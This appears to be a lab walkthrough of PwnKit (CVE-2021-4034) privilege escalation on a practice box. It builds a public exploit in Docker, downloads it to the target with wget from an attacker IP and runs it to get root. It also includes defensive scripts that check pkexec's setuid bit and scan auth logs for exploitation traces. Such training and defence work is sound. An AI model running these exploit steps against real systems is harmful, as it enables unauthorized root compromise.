CVE-2021-4034


PEAS has identified that the target system is vulnerable to CVE-2021-4034

A vulnerability classified as critical has been found in polkit (affected version unknown). It affects some unknown processing of the file /usr/bin/pkexec. Manipulation with an unknown input leads to an access control vulnerability. Classified with CWE, the problem is CWE-284: the product does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity, and availability are impacted.
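The precondition the advisory text describes is a setuid-root /usr/bin/pkexec on a host whose polkit has not been patched. The following is an added defender-side check, not part of the original write-up or of any polkit tooling: it reports whether a given pkexec binary still carries the setuid bit and, on request, applies the interim mitigation from the vendor advisories of dropping that bit. The function names, the PKEXEC_PATH variable and the --fix flag are this example's own.

```shell
#!/bin/sh
# Added example (not from the original write-up): report on and mitigate the
# setuid exposure of pkexec. PKEXEC_PATH defaults to /usr/bin/pkexec; pass
# --fix to apply the interim mitigation (remove the setuid bit).

# Print "setuid", "no-setuid" or "missing" for the file at the given path.
pkexec_setuid_state() {
    path="$1"
    if [ ! -e "$path" ]; then
        echo "missing"
        return 0
    fi
    # -u is the POSIX test for the setuid bit on a file.
    if [ -u "$path" ]; then
        echo "setuid"
    else
        echo "no-setuid"
    fi
}

# Interim mitigation: strip the setuid bit (leaves pkexec usable only by root).
# Prints the resulting state so a caller can confirm the change took effect.
pkexec_drop_setuid() {
    path="$1"
    chmod 0755 "$path"
    pkexec_setuid_state "$path"
}

# Stand-alone run: report on the real binary; apply the mitigation with --fix.
target="${PKEXEC_PATH:-/usr/bin/pkexec}"
echo "$target: $(pkexec_setuid_state "$target")"
if [ "${1:-}" = "--fix" ]; then
    echo "$target after mitigation: $(pkexec_drop_setuid "$target")"
fi
```

Two caveats. First, a patched polkit keeps the setuid bit (the fix is in the code, not the permissions), so "setuid" only means exposed when the package is also unpatched; Debian and Ubuntu backported the fix without changing the 0.105 version string, so check the distribution package's changelog or advisory rather than `pkexec --version`. Second, dropping the bit is a stopgap that breaks legitimate pkexec use for unprivileged users; installing the patched package is the real fix.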

Exploit


Exploit found online

Debian-snmp@escape:/var/tmp$ gcc
gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
Debian-snmp@escape:/var/tmp$ cc
cc
 
Command 'cc' not found, but can be installed with:
 
apt install gcc            
apt install clang          
apt install pentium-builder
apt install tcc            
 
Ask your administrator to install one of them.

No local compiler is available on the target, so the exploit is compiled remotely instead.

Docker Exploit Development


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name escape_offsec ubuntu:18.04  
root@1ed01be491bc:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y

Setting up the environment

root@1ed01be491bc:~# git clone https://github.com/berdav/CVE-2021-4034; cd CVE-2021-4034; make; cd ..; tar -czf CVE-2021-4034.tar.gz ./CVE-2021-4034; cp CVE-2021-4034.tar.gz ./host/
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Unpacking objects: 100% (92/92), done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Downloading, compiling & packaging the exploit

Exploitation


Debian-snmp@escape:/var/tmp$ wget -q http://192.168.45.153/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz; cd CVE-2021-4034

Delivery complete

Debian-snmp@escape:/var/tmp/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
escape
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:76:59 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever
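The exploit run above reaches root through the error path in which pkexec rejects the SHELL variable (or another environment variable) and, while reporting that error, loads the attacker's gconv module. Those rejections are logged through syslog, which gives defenders a trace to look for. The following is an added detection example, not part of the original write-up: it scans an auth-log style file for the two pkexec error messages and lists which local accounts triggered them. The log lines are constructed samples (the hostname and username echo the lab box above; the timestamps, PIDs and the extra sshd/systemctl lines are made up), the helper names are this example's own, and the regex tolerates the misspelling of "suspicious" present in some polkit releases.

```shell
#!/bin/sh
# Added example (not from the original write-up): find pkexec's "rejected
# environment" errors in a syslog/auth.log file. Sample input is constructed.

# The two messages pkexec logs on the code path PwnKit exploits abuse.
PKEXEC_ALERT_RE='pkexec\[[0-9]+\]: .*(SHELL variable was not found|contains sus[a-z]*ious content)'

# Print every line of the file that carries one of those messages.
pkexec_alert_lines() {
    grep -E "$PKEXEC_ALERT_RE" "$1" || true
}

# Print how many such lines the file holds ("0" when none).
pkexec_alert_count() {
    pkexec_alert_lines "$1" | grep -c . || true
}

# Print the distinct local users the messages were logged for: the field
# between "pkexec[PID]: " and the next colon, one user per line.
pkexec_alert_users() {
    pkexec_alert_lines "$1" | sed -E 's/.*pkexec\[[0-9]+\]: ([^:]+):.*/\1/' | sort -u
}

# Write a constructed sample log to a temp file and print its path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Jan 25 12:00:01 escape sshd[1200]: Accepted password for Debian-snmp from 192.168.45.153 port 50112 ssh2
Jan 25 12:03:17 escape pkexec[1842]: Debian-snmp: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/var/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 25 12:03:17 escape pkexec[1842]: Debian-snmp: The value for environment variable PATH contains suscipious content [USER=root] [TTY=unknown] [CWD=/var/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 25 12:04:40 escape pkexec[1901]: alice: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/alice] [COMMAND=/usr/bin/systemctl restart cups]
EOF
    echo "$f"
}

# Stand-alone run: scan the file given as $1, or the constructed sample.
log="${1:-$(make_sample_log)}"
echo "pkexec alerts in $log: $(pkexec_alert_count "$log")"
pkexec_alert_users "$log"
```

Point the script at /var/log/auth.log (or the journal exported with `journalctl -o short`) on the suspect host. A hit is strong evidence, but a miss is not a clean bill of health: the Qualys advisory notes the bug can also be exploited without leaving these log lines, so pair this with the setuid/patch-level check and with the usual review of new root shells and files under world-writable directories such as /var/tmp.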